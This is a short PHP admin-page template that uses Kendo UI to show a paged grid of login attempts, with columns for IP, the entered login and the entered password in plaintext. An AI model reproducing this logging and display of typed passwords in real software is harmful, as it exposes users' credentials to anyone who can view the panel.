<h1 id="head"><?php echo $header ?></h1>
<br>
<input type="hidden" id="page_id" value="<?php echo $list ?>">

<form method="post" action="" id="list">
    <input type="hidden" name="deleted" id="deleted_fld" value="">

    <?php
    require_once '/application/kendo/lib/Kendo/Autoload.php';


    $dataSource = new \Kendo\Data\DataSource();
    $dataSource->data($content);


    $idColumn = new \Kendo\UI\GridColumn();
    $idColumn->title('ID')
        ->field('id')
        ->width(50);

    $headerColumn = new \Kendo\UI\GridColumn();
    $headerColumn->title('IP')
        ->field('ip');

    $loginColumn = new \Kendo\UI\GridColumn();
    $loginColumn->title('Введенный логин')
        ->field('login');

    $passColumn = new \Kendo\UI\GridColumn();
    $passColumn->title('Введенный пароль')
        ->field('pass');

    $dateColumn = new \Kendo\UI\GridColumn();
    $dateColumn->title('Дата')
        ->field('date')
        ->width(160);

    $pageable = new \Kendo\UI\GridPageable();
    $pageable->pageSize(20);
    $pageable->pageSizes(true);


    $grid = new \Kendo\UI\Grid('grid');
    $grid->addColumn($idColumn, $headerColumn, $loginColumn, $passColumn, $dateColumn)
        ->dataSource($dataSource)
        ->navigatable(true)
        ->sortable(true)
        ->scrollable(false)
        ->pageable($pageable);

    echo $grid->render();
